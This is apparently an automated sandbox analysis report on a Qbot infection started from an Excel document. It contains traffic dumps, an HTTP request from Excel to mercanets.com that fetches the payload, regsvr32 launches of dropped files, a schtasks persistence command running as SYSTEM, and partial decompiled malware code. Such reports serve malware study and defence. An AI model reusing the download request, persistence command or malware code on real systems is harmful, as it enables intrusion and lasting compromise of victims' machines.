                                                                                                                                                                                              2021-09-29 21:45:41 UTC280INData Raw: 61 c4 eb 59 34 fb 3c 37 2b 6b 4f 29 06 1a 21 21 8d a8 b3 4f e1 62 38 7b 00 00 00 00 00 00 20 20 a9 b8 a3 c9 db 1b 1b 00 00 16 16 00 00 00 00 00 00 00 00 ff c1 ff 08 7b de 9f ce 85 3a d9 71 c2 22 da b8 83 30 53 ae ff 00 00 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a d7 67 44 df b7 7a 7d 65 f4 0b a1 ff ff 00 00 ff 5f cc 82 31 e7 21 a6 b4 7d d2 8c 90 d3 79 da e6 82 8e 99 ff ff ff 00 00 1a 1a ff 35 f2 11 15 02 1b ff 00 00 00 00 00 00 7d ba 84 32 ec e0 ff 18 5c 63 2f 2a 53 de ff ff ff 00 00 1b 1b 00 00 17 17 ff ff e9 82 3f ee 91 0a 41 1c 1c 20 2a 03 92 64 19 46 19 e5 93 12 4c 20 00 00 00 00 1e 1e 20 c9 fd a9 d5 76 f4 f4 20 00 00 00 00 20 20 00 00 00 00 20 20 1a 1a 4c 4c 04 cc da 7f f4 ce 97 9b 33 22 ad bd ff ff 00 00 00 00 ff ff 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii: aY4<7+kO)!!Ob8{ {:q"0S gDz}e_1!}y5}2\c/*S?A *dFL v LL3"
                                                                                                                                                                                              2021-09-29 21:45:41 UTC288INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff cd f3 fd ff 8a e3 fb ff 3b d1 f9 ff 8b e3 fb ff d0 f4 fd ff ff ff ff ff ff ff ff ff e9 fa fe ff 69 db fa ff 71 dd fa ff dd f7 fe ff ff ff ff ff ff ff ff ff d8 f5 fd ff 8c e4 fb ff 3d d1 f9 ff 87 e2 fb ff c5 f1 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                              Data Ascii: ;iq=
                                                                                                                                                                                              2021-09-29 21:45:41 UTC296INData Raw: 00 1b 1b 00 00 00 00 00 00 00 00 00 00 00 f8 55 ca 51 dc 00 1c 1c 1d 1d 68 05 c0 01 da 9e aa 06 50 87 1a f8 45 6d 88 55 24 86 32 20 20 18 18 00 00 ff ff 85 fd 03 93 4d c2 1e c6 d6 df 48 0c 00 00 ff ff 18 18 ff 8e df 09 93 2c 7a 07 10 14 6d ff db 3c 3a ef 4a f9 74 53 ff 00 00 00 00 1b 1b 00 00 16 16 00 04 ad d8 db 7a 4a 00 1e 1e d7 4d 5f 59 a5 17 12 2f 86 64 3d 6d e5 57 a2 ff ff 00 00 ff ff 00 00 81 4d c4 6d 4c e3 61 ff ff 00 00 ff ff 00 00 1a 1a 1a 1a 00 00 00 85 46 67 6c c8 1c 72 dd 46 44 7a 00 00 00 00 00 00 00 18 18 00 00 ff ff 20 20 ff ff 00 00 62 90 fe 98 fa ec b5 ff ff ff ff 00 b4 80 41 53 dd 35 7a 48 8d f1 f8 d6 59 a6 00 21 21 00 00 ff ff 00 3b 63 7b 7a 70 86 c4 b8 00 00 00 1a 1a 00 00 38 06 62 29 33 1a 1a 00 00 00 00 00 00 21 21 18 18 18 49 e5 a5
                                                                                                                                                                                              Data Ascii: UQhPEmU$2 MH,zm<:JtSzJM_Y/d=mWMmLaFglrFDz bAS5zHY!!;c{zp8b)3!!I
                                                                                                                                                                                              2021-09-29 21:45:41 UTC304INData Raw: ff ff 00 00 18 18 19 19 00 00 00 00 20 8b 48 1f 6c 5f 05 20 00 00 00 00 4e b0 0e f0 2c db 85 f0 c5 c6 4c 42 62 30 95 00 00 19 19 00 00 00 00 3a 39 90 e5 94 05 cb 00 00 20 20 00 00 18 b6 55 0d d4 68 4e 75 0e ef c5 0f 18 00 00 00 00 00 00 ff ff 00 00 00 24 64 39 0e a4 b8 0f 00 ff ff d0 ce 10 89 59 a7 59 df 59 50 39 68 70 8e 00 00 ff ff 20 20 00 00 b2 3b 4e 7b d6 09 37 29 00 00 00 00 00 00 1e 1e 00 00 00 00 00 00 00 49 fa cf 89 97 00 ff ff 00 00 00 00 00 00 00 00 ff ff ff ff 21 21 00 00 0e 55 4e 99 ff 21 70 61 27 67 c1 fd 92 92 ae 74 06 80 c1 20 20 20 20 00 c0 50 b9 a3 bd 76 51 16 9d ff 4d 4a 00 16 16 00 00 1e 1e fe 75 30 49 a3 c6 a3 b7 d3 51 23 dd e4 bd 94 15 67 0c f9 46 fe 00 00 16 16 16 16 99 b5 3b 49 58 39 00 00 18 18 00 00 00 00 00 00 00 00 d6 af 3b 20
                                                                                                                                                                                              Data Ascii: Hl_ N,LBb0:9 UhNu$d9YYYP9hp ;N{7)I!!UN!pa'gt PvQMJu0IQ#gF;IX9;
                                                                                                                                                                                              2021-09-29 21:45:41 UTC312INData Raw: f8 00 fe 00 d6 00 fe 00 d6 00 ff 20 00 00 fe 00 fe 00 ff 00 fd 4c 00 d6 65 00 d6 00 00 ff ff 00 33 00 fe 00 00 00 ff ff f8 fd ff 00 fe fe ff ff ff ff ff 00 fe fe fe ff 32 d5 0b fe fe 00 00 2f ff ff fe ff ff 00 fe ff ff ff 32 d5 00 00 00 fe ff 75 fb 00 ff fe 01 fe 00 68 d0 00 00 fe 00 32 44 00 fe 00 ff fe 00 00 ff 3e ff 00 fe 33 ff fe ff 00 65 ff ff fe fe ff fe fe ff 32 fe ff ff 00 fc fe 00 00 00 00 00 00 fe 7d 00 ff 00 fe fb 7f 00 00 00 00 98 ff ff fe fe fe ff 00 00 00 ff fe 00 00 3a fe 00 ff 32 fe 00 fe ff fe ff 00 32 00 d3 ff fe ff ff 33 0d ff ff ff 00 d5 33 00 00 dd d6 33 00 00 ff 00 d6 cf fe 00 00 fe 66 d5 00 ff 00 32 e0 33 00 00 00 00 d5 fe ff fe f8 00 ff 00 ff 00 00 65 ff ff 00 23 fa f9 ff 00 ff 00 00 00 1f ff 00 ff 33 ff 00 65 00 d5 00 fe fe 00 02
                                                                                                                                                                                              Data Ascii: Le32/2uh2D>3e2}:22333f23e#3e
                                                                                                                                                                                              2021-09-29 21:45:41 UTC320INData Raw: ba 85 17 00 00 00 21 21 00 00 ff ff 00 00 00 00 00 00 ff ff 00 00 e7 88 76 ef 02 ab a4 0b 1b fe f1 00 00 16 16 21 c6 be f3 86 e6 0e 8e 21 00 00 ff ff 21 21 00 4b dc 99 8a 1f 35 51 99 f9 a3 af c1 d5 ae 00 00 00 ff ff 00 00 4d d7 52 f0 16 bb 98 a1 1f 1f 16 16 ff ff 00 00 1d 1d 00 00 43 03 5f 4a 99 20 20 1a a9 c2 5c 2e 88 54 bb 1f a3 73 77 b1 16 43 8c 78 7e 5b 2a 1a ff ff 00 00 21 21 ff ca 6a 40 f5 ef a4 5c 43 f5 ac 41 ae ff 00 00 00 00 ff ff 00 00 00 00 ff ff 00 00 8d 25 fe 33 e5 aa 35 48 11 ce 09 9f 71 74 db 2b 6b 77 0d 00 00 1b 1b ff ff 00 00 00 00 00 00 00 00 1e 1e 00 00 00 57 a8 b1 41 24 98 00 00 00 00 00 e8 8e ee a9 58 83 93 c1 96 d5 45 a8 53 0d 35 1c 1c 1c 1c 1e 1e 00 00 4e 82 45 4d d0 55 68 00 00 1e 1e 00 00 18 bb 88 f2 51 db 49 e3 0b 91 da 0d 18 00
                                                                                                                                                                                              Data Ascii: !!v!!!!K5QMRC_J \.TswCx~[*!!j@\CA%35Hqt+kwWA$XES5NEMUhQI
                                                                                                                                                                                              2021-09-29 21:45:41 UTC328INData Raw: a8 d5 8e 4a 10 5b 49 ff 00 00 ff ff 00 00 00 53 9b 02 cb d3 00 16 16 00 00 00 00 18 18 ff ff 00 00 00 00 9c 4e 78 5e c7 9c ae 53 c8 0f 92 57 63 5c f6 21 e1 24 09 00 00 00 00 00 00 00 00 1b 1b ff ff ff ff 1d 1d 00 00 00 a3 ec c4 84 07 a9 24 b8 7c 05 e2 47 00 21 21 16 16 a5 a8 a4 7b db 61 b6 0c 52 49 d1 b0 ec 90 ea 0e 75 68 80 ff ff 1a 1a 00 00 00 00 60 c0 df 73 ef 60 20 20 00 00 1f 1f 00 2c 48 56 e2 4a 95 f4 d8 55 83 0a bc 94 3c 50 00 00 00 1b 1b 00 00 00 00 ff ff 18 03 f5 d4 71 b7 d1 85 18 00 00 22 2d 93 94 ec 0a ed c2 61 85 01 18 18 1d 1d 00 00 ff ff d1 2f ff 5d ac 56 5d 00 00 00 00 00 00 ff ff 00 00 20 20 00 00 00 fd a9 5d 00 11 49 5c 05 cf b2 8c 5f 4c 65 00 00 00 16 16 ff ff 00 00 00 00 00 00 00 00 1e 1e 00 00 07 eb fc ab 58 10 a0 36 00 00 1b 1b 00 1a
                                                                                                                                                                                              Data Ascii: J[ISNx^SWc\!$$|G!!{aRIuh`s` ,HVJU<Pq"-a/]V] ]I\_LeX6
                                                                                                                                                                                              2021-09-29 21:45:41 UTC336INData Raw: 00 00 00 00 00 00 00 ff ff 00 00 1e 1e ff 38 fd 18 3b c3 bf dd ff 00 00 ff ff d2 b4 93 45 48 c7 d8 d4 be 3b 4f 00 00 1c 1c 21 21 00 00 83 b6 87 c8 6b 8b e2 00 00 00 00 00 00 00 28 b1 4b af aa b3 5a 90 d1 03 29 5a 4f 35 00 ff ff 00 00 00 00 1c 1c 16 16 ff bd 0f d9 11 3a c9 a5 d0 ff 20 20 42 91 72 34 d0 00 00 00 00 1a 1a 00 00 dc 3a 6e e0 78 c4 28 7c e2 aa 9a aa 02 24 3d 1b fd 55 1a 18 18 fe fe 00 00 00 00 00 00 00 00 00 00 ff 7d ef 80 3b c6 98 94 12 52 ff 47 1b ff 00 00 00 00 00 00 20 20 00 00 00 00 00 00 ff ff 18 18 c3 6c 83 04 a9 3e 40 55 ce c8 45 59 7f dc bc d3 fc ad 95 1c 1c 00 00 00 c7 1b e9 6b ed 64 00 00 00 19 19 21 21 00 dc a5 a4 de 35 95 9d 79 55 b3 5f 71 1b ca f3 00 00 00 00 00 00 00 86 2e dc 88 91 24 8e 00 00 00 00 ff ff 00 00 ff ff ff ff d4 1b
                                                                                                                                                                                              Data Ascii: 8;EH;O!!k(KZ)ZO5: Br4:nx(|$=U};RG l>@UEYkd!!5yU_q.$
                                                                                                                                                                                              2021-09-29 21:45:41 UTC344INData Raw: ff 00 00 ff ff 68 1f 0d fc 4d 28 05 6b 7d 4b 7e 16 51 73 9a 1b 1b ff 18 74 21 c1 49 7d 13 ff 21 21 19 19 19 19 00 35 24 d6 87 7d 61 74 4c af 92 72 00 00 00 00 00 1e 1e ff ff 00 00 20 20 00 00 c9 17 5a 5f 1a 99 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 16 21 cd f8 d1 10 b2 5c 1f 2e 3d ae b1 5c 03 4c 21 18 18 00 00 07 f5 fd 8e 09 1c cf a4 00 00 16 16 00 00 00 00 e3 da b3 0a 83 00 00 00 00 1e 1e ff 44 60 76 fb 79 d9 4a 61 ad 33 db 42 1a b4 ed 9e 51 4f 3f ff ff ff 00 00 1b 1b 00 00 1b 1b 16 d3 48 32 78 79 03 40 96 39 c2 57 f5 16 00 00 55 07 ee 88 15 8f 5c 33 04 52 00 62 f5 0b 7d b9 ec 9d 35 00 00 21 21 1e 1e 00 00 cf e0 36 5a d6 74 ff ff 17 17 00 00 00 00 00 00 1e 1e 21 21 00 3a 5c 17 03 68 4c 75 f3 3c 94 c6 d1 4c 2b f2 00 20 20 1a 1a 00 00 00 00
                                                                                                                                                                                              Data Ascii: hM(k}K~Qst!I}!!5$}atLr Z_!\.=\L!D`vyJa3BQO?H2xy@9WU\3Rb}5!!6Zt!!:\hLu<L+
                                                                                                                                                                                              2021-09-29 21:45:41 UTC352INData Raw: 19 ff 01 76 fe ff 65 00 ff 32 00 48 fe fe f5 00 fe 00 ff ff ff fe ff 00 ff 00 fe 33 c9 fe fe fe fe 66 00 00 ff d5 cd e2 00 fe fe 33 ff fe fe 3d 57 fe ff cf 00 ff ea 00 00 fe ff 00 00 fb 00 65 ff fe f8 ff fe ff fe ff 00 c7 00 00 ff f5 00 fe ff fe 00 fe 00 ff 00 00 00 66 00 00 3e d1 fe ff fe fe fe 00 00 fe 00 fe ff fe 00 00 e2 ff 00 65 ff 00 49 00 32 ff fe 00 00 00 fe 65 ff f1 ff 00 00 00 ff ff 51 fe 33 00 fe ff 00 00 00 7d 47 33 4e f6 6b 00 16 16 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 54 6d a9 74 ea c3 86 83 c6 16 79 5e 25 3f c2 16 16 00 00 20 c7 7d e7 fb af 60 8d 20 16 16 00 00 00 00 ff 63 c9 48 17 eb bc 00 d4 f6 50 dd ff 00 00 ff ff 20 20 28 df 91 9e ab e2 92 ff ff ff ff 00 00 00 00 ff ff 00 00 5e 8e e7 c8 f0 46 68 86 8a d8 60 b4 36 7b 00 00 00
                                                                                                                                                                                              Data Ascii: ve2H3f3=Wef>eI2eQ3}G3NkTmty^%? }` cHP (^Fh`6{
                                                                                                                                                                                              2021-09-29 21:45:41 UTC360INData Raw: ff 00 ff fe 00 ff fe 82 00 fe ff fe fe ff a9 fe ff d5 fe ff fe eb a5 c0 fe 00 ff fe 00 ff d5 ff 00 e6 60 00 00 ff ff fe fe fb 33 ff cf fe ff 00 00 fe ff 00 00 66 00 00 fb 00 00 00 ff fe fe fe ff 38 00 00 ff ff 0f dc fb 00 ff d6 ff f6 ff fe fe fe 00 fb 00 fe ff d5 00 00 00 fe 00 00 00 fe fe f1 ff ff fe fe ff 00 e8 ff 33 00 93 fe 00 00 ff 00 ff ff d6 fd 00 fe 6f fe fe 00 00 66 ff 33 fe ef fe ff 65 00 ff fe 00 6b 00 ff ff fa ff ff 00 00 00 f9 00 00 fe fe ff fe 00 66 00 00 00 f8 fe fe 66 fe fe 33 00 65 10 00 32 fe 00 00 00 00 00 00 ff 00 ff fe 00 d1 00 00 33 00 fe fe d6 fe fe ff 00 fe ff fe d6 00 fe 00 65 65 51 ff 00 00 ff fe 00 ff 00 ff 00 00 00 00 00 cd 00 ff 8c fe 07 00 cf 00 ff 00 00 00 00 ff d4 00 ff ff 65 00 c8 33 33 fe 00 33 ff fe fe 00 00 fe fe fe ff
                                                                                                                                                                                              Data Ascii: `3f83of3ekff3e23eeQe333
                                                                                                                                                                                              2021-09-29 21:45:41 UTC368INData Raw: cf 7e 59 2a a7 00 00 00 00 00 00 20 20 00 00 ff ff 1c 1c 00 1d be 91 40 2e 16 00 16 16 00 00 00 00 00 00 00 00 00 00 18 18 1a 1a ff ff e3 63 57 4f a3 a1 41 ce 8b 88 05 c8 25 e4 32 00 00 18 18 21 86 e6 6d 59 52 45 74 21 20 20 00 00 1e 1e ff c0 94 58 90 d6 58 f3 a8 43 d4 c9 ff 00 00 00 00 ff ff df c5 97 ac a8 58 a4 1a 1a 00 00 16 16 ff ff 00 00 00 00 e8 42 de d4 23 c6 15 ff 69 5d 45 2d 90 52 1d 1d 00 10 63 40 ab c0 46 7c 7c 00 ff ff 16 16 00 00 00 fc 48 4d 67 4d 00 1f 1f 00 00 00 00 20 20 00 00 16 16 00 00 1c bb f1 b2 c5 1c ca 99 ad 15 fd 01 f1 a7 69 b9 75 60 d7 00 00 ff ff ff ff 1b 1b 1c 1c 00 00 00 00 ff ff 00 00 00 6c 95 50 bb d7 3b 62 87 91 87 9e 92 00 00 00 1c 1c be 92 c4 e9 b8 31 42 2d 13 27 b8 7c 49 6a c7 1f f7 06 b3 21 21 ff ff 00 00 00 00 61 c3 68
                                                                                                                                                                                              Data Ascii: ~Y* @.cWOA%2!mYREt! XXCXB#i]E-Rc@F||HMgM iu`lP;b1B-'|Ij!!ah
                                                                                                                                                                                              2021-09-29 21:45:41 UTC376INData Raw: 33 d5 00 1a 00 fb 66 00 e0 fe 33 cf 00 ff ff 33 ff 54 ff 00 fe 00 f1 ff ff fe ff 32 32 a0 ff d1 fe 00 33 00 2c 00 ff fe ff fe 00 00 ff b9 67 ff 00 00 00 f7 00 00 ff ff aa ff ff d4 cb fe 00 00 ff fe ff 00 24 ff ff fe ff 00 00 32 00 00 00 ff 00 00 32 00 d5 00 96 ff fe 00 ff 00 fb de ff 00 33 00 ff ae ff d2 00 fe ff ff 00 03 ff fe fe ff fe fe fe 9c d6 d8 00 fe d6 00 13 fe ff 04 00 33 fe 00 ff 00 3b 32 fe fe 00 ff 9f 00 00 33 00 00 f1 ff ff 00 fe fe fe fe 00 f9 d5 ff ff fe 00 ff fe cc ff fe 65 f8 00 ff ff ff ff 00 f9 fe fe e1 ff 00 33 00 e1 00 fe ef 33 00 00 33 00 ff 32 ed ff fe ff 00 ff 00 fe fe ff 00 00 00 00 33 fe ff fe 32 df ff ff 00 32 00 ff 00 00 00 00 fe 00 ff aa 00 66 ff ff fc cf 00 00 ff 00 dd fe ff 00 00 fe 32 32 00 d6 ff fe ff ff ff 00 00 ff fe 33
                                                                                                                                                                                              Data Ascii: 3f33T223,g$2233;23e3332322f223
                                                                                                                                                                                              2021-09-29 21:45:41 UTC384INData Raw: 27 ff 00 00 00 ff 00 00 ff 00 e8 e6 00 02 fe ff fe 00 00 00 ff 00 00 00 00 d6 fe 00 66 00 fe fe fe 5d ff 33 33 ff ff fe 33 0c 00 00 ff 00 ff fe e0 d6 2e 33 ff 00 52 fe 01 ff fe 04 00 fe 6b ff ff ff d5 00 00 e7 ff fe e6 00 00 ff ff ff b8 ff ff 00 80 fe fe 00 d6 ff 0f 00 fa ff 00 00 00 ff ff ff 32 ff 00 fe fe d6 ff fe 00 fe 3b 00 ff d6 fe 33 fe ff fe ff 00 ff fe 00 ff ff 65 fe 00 00 00 00 00 ff ff cf cb 90 fe 2c 00 66 fe 20 66 00 cd ff 00 fe 00 00 0b fe 00 fd 80 fe 3a fe f8 ef ff ff 65 ca ff ff 5d c5 65 00 00 ff 00 ff 66 00 ff 66 47 fe fe 00 ea bb 3f fe ff ff dc 00 00 ff 33 ff 02 33 8e 00 fe ff d6 00 e3 00 21 fe c5 fe ff 33 00 00 00 d6 fb e1 00 00 00 00 66 01 ff ff ff fe 00 00 33 fe fe fe fe ff 00 00 f7 00 fe 00 ff 00 ff ff fe 5f 88 00 fe 00 00 00 fe 00 ff
                                                                                                                                                                                              Data Ascii: 'f]333.3Rk2;3e,f f:e]effG?33!3f3_


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49752 | 162.222.225.250 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
2021-09-29 21:45:42 UTC | 466 | OUT | GET /9DPZqAfZdq5z/key.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: mercanets.com
Connection: Keep-Alive
2021-09-29 21:45:44 UTC | 467 | IN | HTTP/1.1 200 OK
Date: Wed, 29 Sep 2021 21:45:42 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Content-Length: 0
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:45:34
                                                                                                                                                                                              Start date:29/09/2021
                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                              Imagebase:0x9b0000
                                                                                                                                                                                              File size:27110184 bytes
                                                                                                                                                                                              MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:45:44
                                                                                                                                                                                              Start date:29/09/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
                                                                                                                                                                                              Imagebase:0x210000
                                                                                                                                                                                              File size:20992 bytes
                                                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:45:44
                                                                                                                                                                                              Start date:29/09/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
                                                                                                                                                                                              Imagebase:0x210000
                                                                                                                                                                                              File size:20992 bytes
                                                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000009.00000003.380505097.0000000003320000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:45:45
                                                                                                                                                                                              Start date:29/09/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
                                                                                                                                                                                              Imagebase:0x210000
                                                                                                                                                                                              File size:20992 bytes
                                                                                                                                                                                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:46:24
                                                                                                                                                                                              Start date:29/09/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                              Imagebase:0xd20000
                                                                                                                                                                                              File size:3611360 bytes
                                                                                                                                                                                              MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:46:26
                                                                                                                                                                                              Start date:29/09/2021
                                                                                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtwplfwnel /tr 'regsvr32.exe -s \'C:\Datop\test1.test\'' /SC ONCE /Z /ST 23:48 /ET 24:00
                                                                                                                                                                                              Imagebase:0xce0000
                                                                                                                                                                                              File size:185856 bytes
                                                                                                                                                                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              General

                                                                                                                                                                                              Start time:23:46:27
                                                                                                                                                                                              Start date:29/09/2021
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x7ff7f20f0000
                                                                                                                                                                                              File size:625664 bytes
                                                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high

                                                                                                                                                                                              Disassembly

                                                                                                                                                                                              Code Analysis

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                			E1000D061(void* __fp0) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                				struct _SYSTEM_INFO _v52;
                                                                                                                                                                                                				char _v180;
                                                                                                                                                                                                				char _v692;
                                                                                                                                                                                                				char _v704;
                                                                                                                                                                                                				char _v2680;
                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                				struct _OSVERSIONINFOA* _t81;
                                                                                                                                                                                                				intOrPtr _t83;
                                                                                                                                                                                                				void* _t84;
                                                                                                                                                                                                				long _t86;
                                                                                                                                                                                                				intOrPtr* _t88;
                                                                                                                                                                                                				intOrPtr _t90;
                                                                                                                                                                                                				intOrPtr _t91;
                                                                                                                                                                                                				intOrPtr _t92;
                                                                                                                                                                                                				int _t98;
                                                                                                                                                                                                				intOrPtr _t103;
                                                                                                                                                                                                				char* _t105;
                                                                                                                                                                                                				void* _t108;
                                                                                                                                                                                                				intOrPtr _t111;
                                                                                                                                                                                                				char _t115;
                                                                                                                                                                                                				signed int _t117;
                                                                                                                                                                                                				char _t119;
                                                                                                                                                                                                				intOrPtr _t124;
                                                                                                                                                                                                				intOrPtr _t127;
                                                                                                                                                                                                				intOrPtr _t130;
                                                                                                                                                                                                				intOrPtr _t134;
                                                                                                                                                                                                				intOrPtr _t145;
                                                                                                                                                                                                				intOrPtr _t147;
                                                                                                                                                                                                				intOrPtr _t149;
                                                                                                                                                                                                				intOrPtr _t152;
                                                                                                                                                                                                				intOrPtr _t154;
                                                                                                                                                                                                				signed int _t159;
                                                                                                                                                                                                				struct HINSTANCE__* _t162;
                                                                                                                                                                                                				short* _t164;
                                                                                                                                                                                                				intOrPtr _t167;
                                                                                                                                                                                                				WCHAR* _t168;
                                                                                                                                                                                                				char* _t169;
                                                                                                                                                                                                				intOrPtr _t181;
                                                                                                                                                                                                				intOrPtr _t200;
                                                                                                                                                                                                				void* _t215;
                                                                                                                                                                                                				char _t218;
                                                                                                                                                                                                				void* _t219;
                                                                                                                                                                                                				char* _t220;
                                                                                                                                                                                                				struct _OSVERSIONINFOA* _t222;
                                                                                                                                                                                                				void* _t223;
                                                                                                                                                                                                				int* _t224;
                                                                                                                                                                                                				void* _t241;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t241 = __fp0;
                                                                                                                                                                                                				_t162 =  *0x1001e69c; // 0x10000000
                                                                                                                                                                                                				_t81 = E100085E5(0x1ac4);
                                                                                                                                                                                                				_t222 = _t81;
                                                                                                                                                                                                				if(_t222 == 0) {
                                                                                                                                                                                                					return _t81;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                                                                                                                                                                                                				_t83 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                                                                                                                                                                                                				_t3 = _t222 + 0x648; // 0x648
                                                                                                                                                                                                				E10012339( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                                                                                                                                                                                                				_t5 = _t222 + 0x1644; // 0x1644
                                                                                                                                                                                                				_t216 = _t5;
                                                                                                                                                                                                				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                                                                                                                                                                                                				_t227 = _t86;
                                                                                                                                                                                                				if(_t86 != 0) {
                                                                                                                                                                                                					 *((intOrPtr*)(_t222 + 0x1854)) = E10008F9F(_t216, _t227);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				GetCurrentProcess();
                                                                                                                                                                                                				_t88 = E1000BA47(); // executed
                                                                                                                                                                                                				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
                                                                                                                                                                                                				_t178 =  *_t88;
                                                                                                                                                                                                				if(E1000BBCF( *_t88) == 0) {
                                                                                                                                                                                                					_t90 = E1000BAA4(_t178, _t222); // executed
                                                                                                                                                                                                					__eflags = _t90;
                                                                                                                                                                                                					_t181 = (0 | _t90 > 0x00000000) + 1;
                                                                                                                                                                                                					__eflags = _t181;
                                                                                                                                                                                                					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					 *((intOrPtr*)(_t222 + 0x214)) = 3;
